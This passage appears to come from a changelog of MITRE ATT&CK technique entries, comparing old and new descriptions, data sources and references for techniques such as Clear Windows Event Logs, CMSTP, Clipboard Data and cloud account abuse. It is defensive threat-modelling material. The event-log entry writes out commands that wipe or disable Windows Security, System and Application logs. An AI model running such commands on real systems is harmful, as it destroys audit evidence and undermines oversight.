  New value: Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Command: Command Execution → File: File Creation
x_mitre_data_sources[2]: File: File Creation → Command: Command Execution
x_mitre_version: 1.1 → 1.2

iterable_item_added (STIX Field: New value)
x_mitre_contributors: Mark Wee

[T1197] BITS Jobs

Current version: 1.4

Version changed from: 1.3 → 1.4

Dropped Mitigations:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-09-14 19:21:26.447000+00:00 → 2023-04-21 12:21:40.927000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.3 → 1.4

iterable_item_added (STIX Field: New value)
x_mitre_data_sources: Command: Command Execution

iterable_item_removed (STIX Field: Old value)
x_mitre_data_sources: Command: Command Execution

[T1110] Brute Force

Current version: 2.5

Version changed from: 2.4 → 2.5

Dropped Mitigations:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-19 21:28:49.481000+00:00 → 2023-04-14 23:03:34.362000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: User Account: User Account Authentication → Application Log: Application Log Content
x_mitre_data_sources[2]: Application Log: Application Log Content → User Account: User Account Authentication
x_mitre_version: 2.4 → 2.5

iterable_item_removed (STIX Field: Old value)
external_references: {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'}

[T1612] Build Image on Host

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)  An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

New Description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)  An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
Details
dictionary_item_added (STIX Field: New value)
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False

dictionary_item_removed (STIX Field: Old value)
x_mitre_permissions_required: ['User', 'root']

values_changed (STIX Field: Old value → New value)
modified: 2022-04-01 13:04:00.946000+00:00 → 2023-04-15 16:22:09.807000+00:00
description:
  Old value: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
  New value: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
external_references[1]['source_name']: Docker Build Image → Aqua Build Images on Hosts
external_references[1]['description']: Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021. → Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.
external_references[1]['url']: https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild → https://blog.aquasec.com/malicious-container-image-docker-container-host
external_references[2]['source_name']: Aqua Build Images on Hosts → Docker Build Image
external_references[2]['description']: Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021. → Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.
external_references[2]['url']: https://blog.aquasec.com/malicious-container-image-docker-container-host → https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Network Traffic: Network Connection Creation
x_mitre_data_sources[1]: Image: Image Creation → Network Traffic: Network Traffic Flow
x_mitre_data_sources[2]: Network Traffic: Network Traffic Flow → Image: Image Creation
x_mitre_data_sources[3]: Network Traffic: Network Connection Creation → Network Traffic: Network Traffic Content
x_mitre_version: 1.2 → 1.3

[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-19 15:11:20.036000+00:00 → 2023-04-21 12:35:39.112000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

iterable_item_added (STIX Field: New value)
x_mitre_data_sources: Command: Command Execution

iterable_item_removed (STIX Field: Old value)
x_mitre_data_sources: Command: Command Execution

[T1218.003] System Binary Proxy Execution: CMSTP

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added (STIX Field: New value)
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False

dictionary_item_removed (STIX Field: Old value)
x_mitre_permissions_required: ['User']

values_changed (STIX Field: Old value → New value)
modified: 2022-03-11 18:38:36.109000+00:00 → 2023-04-21 12:24:13.666000+00:00
external_references[1]['source_name']: Microsoft Connection Manager Oct 2009 → Twitter CMSTP Usage Jan 2018
external_references[1]['description']: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018. → Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.
external_references[1]['url']: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10) → https://twitter.com/ItsReallyNick/status/958789644165894146
external_references[2]['source_name']: Twitter CMSTP Usage Jan 2018 → Microsoft Connection Manager Oct 2009
external_references[2]['description']: Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018. → Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.
external_references[2]['url']: https://twitter.com/ItsReallyNick/status/958789644165894146 → https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)
external_references[4]['source_name']: Twitter CMSTP Jan 2018 → GitHub Ultimate AppLocker Bypass List
external_references[4]['description']: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018. → Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.
external_references[4]['url']: https://twitter.com/NickTyrer/status/958450014111633408 → https://github.com/api0cradle/UltimateAppLockerByPassList
external_references[5]['source_name']: GitHub Ultimate AppLocker Bypass List → Endurant CMSTP July 2018
external_references[5]['description']: Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018. → Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.
external_references[5]['url']: https://github.com/api0cradle/UltimateAppLockerByPassList → http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
external_references[6]['source_name']: Endurant CMSTP July 2018 → Twitter CMSTP Jan 2018
external_references[6]['description']: Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018. → Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.
external_references[6]['url']: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ → https://twitter.com/NickTyrer/status/958450014111633408
x_mitre_version: 2.0 → 2.1

[T1070.003] Indicator Removal: Clear Command History

Current version: 1.4

Version changed from: 1.3 → 1.4

Dropped Mitigations:

Details

values_changed
STIX Field | Old value | New Value
modified | 2022-09-01 21:58:56.496000+00:00 | 2023-04-07 17:20:44.770000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | File: File Modification | User Account: User Account Authentication
x_mitre_data_sources[1] | File: File Deletion | Command: Command Execution
x_mitre_data_sources[2] | User Account: User Account Authentication | File: File Deletion
x_mitre_data_sources[3] | Command: Command Execution | File: File Modification
x_mitre_version | 1.3 | 1.4

[T1070.008] Indicator Removal: Clear Mailbox Data

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:

Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)

New Description:

Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)

New Mitigations:

New Detections:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | ['Liran Ravich, CardinalOps']

values_changed
STIX Field | Old value | New Value
modified | 2022-10-17 17:41:43.552000+00:00 | 2023-04-12 20:56:32.743000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
x_mitre_data_sources | | Process: Process Creation
x_mitre_data_sources | | Application Log: Application Log Content

iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Process: Process Creation |

[T1070.009] Indicator Removal: Clear Persistence

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm)

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)

New Description:

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)

New Detections:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | ['Gavin Knapp']

values_changed
STIX Field | Old value | New Value
modified | 2022-10-18 23:40:32.055000+00:00 | 2023-04-11 22:30:01.227000+00:00
description | see Old Description above | see New Description above
external_references[2]['source_name'] | NCC Group Team9 June 2020 | Talos - Cisco Attack 2022
external_references[2]['description'] | Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. | Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.
external_references[2]['url'] | https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ | https://blog.talosintelligence.com/recent-cyber-attack/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[7] | Windows Registry: Windows Registry Key Deletion | User Account: User Account Deletion
x_mitre_version | 1.0 | 1.1

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'NCC Group Team9 June 2020', 'description': 'Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.', 'url': 'https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/'}
x_mitre_data_sources | | Command: Command Execution
x_mitre_data_sources | | Windows Registry: Windows Registry Key Deletion

iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Command: Command Execution |

[T1070.001] Indicator Removal: Clear Windows Event Logs

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* wevtutil cl system
* wevtutil cl application
* wevtutil cl security

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).

New Description:

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* wevtutil cl system
* wevtutil cl application
* wevtutil cl security

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)

Dropped Mitigations:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | ['Lucas Heiligenstein']

values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 13:02:07.168000+00:00 | 2023-04-12 15:32:03.205000+00:00
description | see Old Description above | see New Description above
external_references[1]['source_name'] | Microsoft Clear-EventLog | disable_win_evt_logging
external_references[1]['description'] | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. | Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[1]['url'] | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog | https://ptylu.github.io/content/report/report.html?report=25
external_references[2]['source_name'] | Microsoft EventLog.Clear | Microsoft Clear-EventLog
external_references[2]['description'] | Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018. | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.
external_references[2]['url'] | https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog
external_references[3]['source_name'] | Microsoft wevtutil Oct 2017 | Microsoft EventLog.Clear
external_references[3]['description'] | Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. | Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.
external_references[3]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil | https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution
x_mitre_data_sources[2] | Command: Command Execution | Process: OS API Execution
x_mitre_version | 1.1 | 1.2

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Microsoft wevtutil Oct 2017', 'description': 'Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.', 'url': 'https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil'}

[T1115] Clipboard Data

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)

New Description:

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)

macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)

Dropped Mitigations:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
external_references | | CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.

dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-637 |

values_changed
STIX Field | Old value | New Value
modified | 2020-04-23 18:35:58.230000+00:00 | 2023-04-14 21:51:47.277000+00:00
description | see Old Description above | see New Description above
external_references[1]['source_name'] | capec | CISA_AA21_200B
external_references[1]['url'] | https://capec.mitre.org/data/definitions/637.html | https://www.cisa.gov/uscert/ncas/alerts/aa21-200b
external_references[2]['source_name'] | MSDN Clipboard | mining_ruby_reversinglabs
external_references[2]['description'] | Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016. | Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.
external_references[2]['url'] | https://msdn.microsoft.com/en-us/library/ms649012 | https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems
external_references[3]['source_name'] | Operating with EmPyre | clip_win_server
external_references[3]['description'] | rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017. | Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.
external_references[3]['url'] | https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363 | https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip
x_mitre_version | 1.1 | 1.2

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'MSDN Clipboard', 'description': 'Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.', 'url': 'https://msdn.microsoft.com/en-us/library/ms649012'}
external_references | | {'source_name': 'Operating with EmPyre', 'description': 'rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.', 'url': 'https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363'}

[T1136.003] Create Account: Cloud Account

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

New Description:

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

Details

values_changed
STIX Field | Old value | New Value
modified | 2022-04-07 13:09:30.819000+00:00 | 2023-03-06 21:24:56.669000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description:

Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.

Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.

New Description:

Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.

Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.

New Mitigations:

Details

values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 20:23:33.894000+00:00 | 2023-03-21 13:17:14.441000+00:00
description | see Old Description above | see New Description above
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | User Account: User Account Authentication | Logon Session: Logon Session Creation
x_mitre_data_sources[2] | Logon Session: Logon Session Creation | User Account: User Account Authentication
x_mitre_version | 1.4 | 1.5

[T1069.003] Permission Groups Discovery: Cloud Groups

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

New Description
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-19 02:44:58.838000+00:00 → 2023-03-21 13:33:40.625000+00:00
description:
  Old value: Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
